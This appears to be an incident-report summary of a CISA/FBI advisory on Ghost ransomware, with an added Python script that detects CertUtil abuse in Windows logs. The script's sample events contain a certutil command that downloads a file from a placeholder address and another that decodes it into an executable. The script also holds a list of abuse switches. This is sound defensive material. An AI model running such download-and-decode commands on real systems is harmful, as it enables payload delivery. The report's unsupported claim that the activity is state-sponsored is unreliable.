Full Report
CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. [...]
Analysis Summary
# Incident Report: Global Ghost Ransomware Campaign
## Executive Summary
CISA and the FBI issued a joint advisory concerning a widespread campaign utilizing the Ghost ransomware variant, which has breached organizations across approximately 70 countries since its first detection in early 2021. The attackers primarily leveraged unpatched Fortinet FortiOS SSL VPN vulnerabilities to gain initial access, then used post-exploitation tools such as Mimikatz and Cobalt Strike before dropping the ransomware payload. Response recommendations focus on immediate patching of known vulnerabilities, network segmentation, and phishing-resistant MFA.
## Incident Details
- **Discovery Date:** Advisory issued in early 2025 (based on recent FBI investigations mentioning January 2025 activity).
- **Incident Date:** First spotted in early 2021, with continued activity referenced up to January 2025.
- **Affected Organization:** Organizations across 70 countries globally.
- **Sector:** Not explicitly limited; impacted targets include election support systems and various enterprises.
- **Geography:** Global (70 countries).
## Timeline of Events
### Initial Access
- **Date/Time:** Beginning in early 2021 (and ongoing into early 2025).
- **Vector:** Exploitation of unpatched **Fortinet SSL VPN appliances**, specifically targeting **CVE-2018-13379**. Other vulnerabilities mentioned include CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
- **Details:** Attackers scanned for and exploited vulnerable Fortinet FortiOS servers exposed to the internet.
### Lateral Movement
- **Date/Time:** Following initial access.
- **Details:** Attackers deployed custom **Mimikatz** samples for credential access and **Cobalt Strike beacons** to maintain persistence and provide command and control.
### Data Exfiltration/Impact
- **Date/Time:** Prior to payload deployment.
- **Details:** The final impact was the deployment of the **Ghost ransomware payload**. The full scope of data exfiltration is not detailed, but the observed credential theft suggests that data theft likely occurred.
### Detection & Response
- **Detection:** Detected through FBI investigations leading up to a joint advisory issued by CISA, FBI, and MS-ISAC.
- **Response Actions:** Authorities released tactical indicators, TTPs, and detection methods to aid organizations in identifying and mitigating compromise.
## Attack Methodology
- **Initial Access:** Exploitation of **CVE-2018-13379** in Fortinet SSL VPN appliances.
- **Persistence:** Deployment of **Cobalt Strike beacons**.
- **Privilege Escalation:** Implied via credential access tools.
- **Defense Evasion:** Use of legitimate Windows tools like **CertUtil** for deploying payloads to bypass security software.
- **Credential Access:** Use of custom **Mimikatz** samples.
- **Discovery:** Standard reconnaissance likely occurred post-access to map the environment.
- **Lateral Movement:** Facilitated by Cobalt Strike beacons after credentials were obtained.
- **Collection:** Implied by the use of credential access tools prior to encryption.
- **Exfiltration:** Not explicitly detailed, but likely high-value data targeted before encryption.
- **Impact:** Encryption of systems via **Ghost ransomware**.
## Impact Assessment
- **Financial:** Not specified, but potentially significant due to widespread global targeting.
- **Data Breach:** Implied due to the use of credential harvesting tools (Mimikatz).
- **Operational:** Significant system downtime due to ransomware deployment.
- **Reputational:** High given breaches across 70 countries.
## Indicators of Compromise
*Note: Specific IOCs (URLs/IPs) were not provided in the source text, so there is nothing to defang; only CVEs and tool names were given.*
- **Network indicators:** (Not provided in source)
- **File indicators:** Custom Mimikatz samples, Cobalt Strike payloads.
- **Behavioral indicators:** Use of **Windows CertUtil** utility for payload execution.
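The behavioral indicator above (CertUtil used to fetch or unpack a payload) is one of the few on the page that a defender can turn directly into a detection. The following is an added example, not code from the advisory or from CISA/FBI: it parses constructed process-creation events in a simplified Sysmon Event ID 1 key=value layout (an assumed log format; the hosts, users, paths and the 203.0.113.5 TEST-NET address are all made up) and flags `certutil.exe` invocations whose switches indicate a download or a decode rather than ordinary certificate management. The switch list is an assumption drawn from common detection practice, not from the advisory.

```python
"""Flag CertUtil abuse in Windows process-creation logs (added detection example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample events in a simplified Sysmon Event ID 1 (process create)
# key=value layout. These are NOT real events from the advisory.
SAMPLE_LOGS = [
    'EventID=1 Host=WS01 User=CORP\\alice Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="certutil.exe -urlcache -split -f http://203.0.113.5/update.bin C:\\Users\\Public\\update.bin"',
    'EventID=1 Host=WS01 User=CORP\\alice Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="certutil.exe -decode C:\\Users\\Public\\update.txt C:\\Users\\Public\\update.exe"',
    # Benign: an administrator viewing a certificate store from the MMC console.
    'EventID=1 Host=SRV02 User=CORP\\svc_pki Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage=C:\\Windows\\System32\\mmc.exe '
    'CommandLine="certutil.exe -viewstore -user My"',
    # Benign: unrelated process.
    'EventID=1 Host=WS03 User=CORP\\bob Image=C:\\Windows\\System32\\notepad.exe '
    'ParentImage=C:\\Windows\\explorer.exe CommandLine="notepad.exe notes.txt"',
]

# CertUtil switches that indicate file transfer or payload unpacking rather than
# certificate administration (assumed list based on common detection rules).
SWITCH_REASONS = {
    "urlcache": "remote file download via URL cache",
    "verifyctl": "remote file download via CTL verification",
    "decode": "Base64 decode of a dropped file",
    "decodehex": "hex decode of a dropped file",
    "encode": "Base64 encode of a local file (staging for transfer)",
}

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    command_line: str
    reasons: list[str] = field(default_factory=list)


def parse_event(line: str) -> dict[str, str]:
    """Turn one key=value log line into a dict, stripping quotes from values."""
    fields: dict[str, str] = {}
    for key, raw in _KV.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def certutil_switches(cmdline: str) -> list[str]:
    """Return the normalised switch names (without '-' or '/', lower-cased)."""
    return [tok.lstrip("-/").lower() for tok in cmdline.split() if tok[:1] in "-/"]


def analyze(lines: list[str]) -> list[Finding]:
    """Return one Finding per certutil.exe process-create event with suspicious switches."""
    findings: list[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        if not ev.get("Image", "").lower().endswith("\\certutil.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        hits = [s for s in certutil_switches(cmd) if s in SWITCH_REASONS]
        if not hits:
            continue  # ordinary certificate management, e.g. -viewstore
        findings.append(Finding(
            host=ev.get("Host", "?"),
            user=ev.get("User", "?"),
            parent=ev.get("ParentImage", "?"),
            command_line=cmd,
            reasons=[SWITCH_REASONS[s] for s in hits],
        ))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"[ALERT] {f.host} {f.user} parent={f.parent}: {', '.join(f.reasons)}")
        print(f"        {f.command_line}")
```

Triage uses the parent process and user: a download or decode launched from `cmd.exe` under an interactive user account is far more suspicious than the same binary started by a PKI management console. The same logic maps onto a SIEM query or a Sigma rule keyed on `Image` and `CommandLine`.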
## Response Actions
*Based on the lessons learned and recommendations issued in the advisory:*
- **Containment:** (Implied) Isolate affected systems; block C2 traffic associated with Cobalt Strike.
- **Eradication:** (Step 3) Patch all actively exploited CVEs immediately (especially CVE-2018-13379).
- **Recovery:** Restore from **air-gapped and off-site system backups** that cannot be encrypted by ransomware.
## Lessons Learned
- Significant risk associated with long-standing, publicly disclosed vulnerabilities in perimeter devices (e.g., Fortinet SSL VPNs).
- Attackers frequently combine established TTPs (Mimikatz, Cobalt Strike) with novel evasion techniques (CertUtil use).
- State-sponsored activity has successfully leveraged common enterprise vulnerabilities (such as CVE-2018-13379) to deploy ransomware.
## Recommendations
1. **Patch Management:** Promptly patch operating systems, software, and firmware, focusing immediately on vulnerabilities targeted by Ghost ransomware (CVE-2018-13379, etc.).
2. **Segmentation:** Implement network segmentation to severely limit an attacker's ability to move laterally from an initially compromised device.
3. **MFA:** Enforce phishing-resistant Multi-Factor Authentication (MFA) for all privileged accounts and email service accounts.
4. **Backup Strategy:** Maintain secured, **air-gapped, and immutable off-site backups** so that systems can be restored to a clean, pre-encryption state.